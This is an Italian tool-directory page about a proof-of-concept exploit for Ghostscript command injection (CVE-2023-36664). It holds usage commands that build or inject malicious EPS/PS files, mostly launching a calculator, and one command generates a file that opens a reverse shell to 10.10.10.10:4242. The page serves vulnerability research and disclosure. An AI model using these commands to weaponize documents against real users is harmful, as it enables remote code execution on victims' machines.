Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-36664-Ghostscript-command-injection — PoC della vulnerabilità di command injection in Ghostscript (CVE-2023-36664) | Kitploit
Strumenti/GitHubGitHub/jakabakos/cve-2023-36664-ghostscript-command-injection
Generazione di PayloadAnalisi delle VulnerabilitàExploitPaper e RicercaApprendimento e Formazione
GitHubjakabakos/cve-2023-36664-ghostscript-command-injection

CVE-2023-36664-Ghostscript-command-injection

PoC della vulnerabilità di command injection in Ghostscript (CVE-2023-36664)

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
130162 anni faRevisionato da Kitploit

PoC della vulnerabilità di command injection in Ghostscript (CVE-2023-36664)

La vulnerabilità, divulgata in Ghostscript precedente alla versione 10.01.2, consente l'esecuzione di codice (punteggio CVSS 9.8).

Ufficiale descrizione della vulnerabilità:

Artifex Ghostscript fino alla 10.01.2 gestisce erroneamente la convalida dei permessi per i dispositivi pipe (con il prefisso %pipe% o il prefisso del carattere pipe |).

Debian ha rilasciato un avviso di sicurezza che menziona la possibile esecuzione di comandi arbitrari:

"È stato scoperto che Ghostscript, l'interprete GPL PostScript/PDF, non gestisce correttamente la convalida dei permessi per i dispositivi pipe, il che potrebbe comportare l'esecuzione di comandi arbitrari se vengono elaborati file di documento malformati."

La repository è stata creata per un post del blog di analisi CVE disponibile su blog di vsociety.

Sfruttamento

Scarica Ghostscript 10.01.1 qui: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011 Link diretto all'eseguibile Windows x64: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe

Lo sfruttamento può avvenire all'apertura di un file PS o EPS e può consentire l'esecuzione di codice a causa della gestione errata della convalida dei permessi per i dispositivi pipe da parte di Ghostscript.

Utilizzo: python3 CVE_2023_36664_exploit.py <input_file> <command>

Esempio:

root@kitploit:~
python3 CVE_2023_36664_exploit.py file.eps "calc"

Questo genera un nuovo file chiamato file_injected.eps.

Aprilo con Ghostscript per attivare la calcolatrice (dalla versione 9.50 devi anche usare l'opzione -dNOSAFER):

root@kitploit:~
gs10011w64.exe -dNOSAFER .\file_injected.eps
prova

Altri esempi: Genera un nuovo file EPS chiamato run_calculator.eps con payload "calc" (apre una nuova calcolatrice su Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps

Genera un nuovo file EPS chiamato rev_shell.eps con un IP personalizzato (avvia una reverse shell quando viene attivato su Unix)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps

Genera un nuovo file PS malicius.ps con payload "calc" (apre una nuova calcolatrice su Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps

Inietta un payload personalizzato dannoso ("calc") in un file esistente chiamato file.eps (apre una nuova calcolatrice su Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps

Dichiarazione di non responsabilità

Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è inteso per essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.

Scarica lo strumento